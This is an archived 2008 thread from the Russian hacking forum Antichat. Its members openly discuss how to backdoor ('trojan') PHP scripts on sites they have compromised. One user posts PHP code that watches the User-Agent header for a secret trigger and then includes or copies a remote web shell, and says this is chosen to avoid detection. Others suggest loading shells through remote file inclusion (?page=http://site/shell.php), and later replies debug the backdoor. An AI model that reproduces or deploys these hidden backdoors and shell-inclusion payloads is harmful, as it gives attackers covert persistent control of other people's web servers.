ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование_OLD > PHP, PERL, MySQL, JavaScript
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.03.2008, 11:55
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

Цитата:
Сообщение от Scipio  
Так тебе надо скрипт протроянить? вот:
то что ты мне дал как вызывается?
 

  #2  
Старый 30.03.2008, 12:14
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

Цитата:
Сообщение от QZAR-X  
то что ты мне дал как вызывается?
читай внимательнее, это он не тебе писал.

В твоем случае нужно залить на любой другой хост пхп шелл, а потом уже его подключаешь - ?page=http://site.r/shell.php
 

  #3  
Старый 30.03.2008, 10:50
azote
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме:
52770

Репутация: -5
По умолчанию

Может поможет мне ктонить? А? Мой пост несколько страниц назад...
 

  #4  
Старый 30.03.2008, 10:58
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от azote  
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?

Последний раз редактировалось heks; 30.03.2008 в 11:02..
 

  #5  
Старый 30.03.2008, 11:32
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

ne короче такая тема нашел на сайте инклуд. инклудит страницу с другого сайта например страница php открывается как php а когда инклудишь txt открывается как txt что нить можно сделать с такой иньекцией
 

  #6  
Старый 30.03.2008, 12:00
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

есть у тебя допустим скрипт:
PHP код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (
strpos($k,"f35761"){ $path=explode("^",$k); include($path[1]);}
....
?>
ты меняешь у себя юзер агент (имя браузера) на например f35761^http://site/shell.php

и вызываешь этот скрипт, он проинклюдит http://site/shell.php
__________________
Карфаген должен быть разрушен...
 

  #7  
Старый 30.03.2008, 12:02
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме:
54867

Репутация: 5
По умолчанию

у меня ошибку во 2-ой строке вываливает
Parse error: syntax error, unexpected '{'
 

  #8  
Старый 30.03.2008, 12:06
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

после if (strpos($k,"f35761") скобку ) поставь, я почемуто пропустил
__________________
Карфаген должен быть разрушен...
 

  #9  
Старый 30.03.2008, 12:40
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

писал я это для QZAR-X, тут если тебе инклюд не нужен, можешь функцию copy использовать, но опять же копирование будет с удаленного серва (имхо инклюд в этом случае надежнее, хотя хз)
Код:
<?php
....
$k=$_SERVER["USER_AGENT"];
....
if (strpos($k,"f35761")){ $path=explode("^",$k); copy(path[1],path[2]);}
....
?>
здесь в юзер агент пишешь: f35761^http://site/shell.php^/path/na/serve/shell.php
спросиш нахрена нужны заморочки с юзер агентом, скажу, для меньшего палева, вобще вариантов куча, мог бы и сам че нить придумать
__________________
Карфаген должен быть разрушен...
 

  #10  
Старый 30.03.2008, 13:38
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Scipio
if (strpos($k,"f35761")) - если f35761 стоит в начале строки, то надо либо if (strpos($k,"f35761") !== FALSE), либо if (strpos(' '.$k,"f35761"))
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ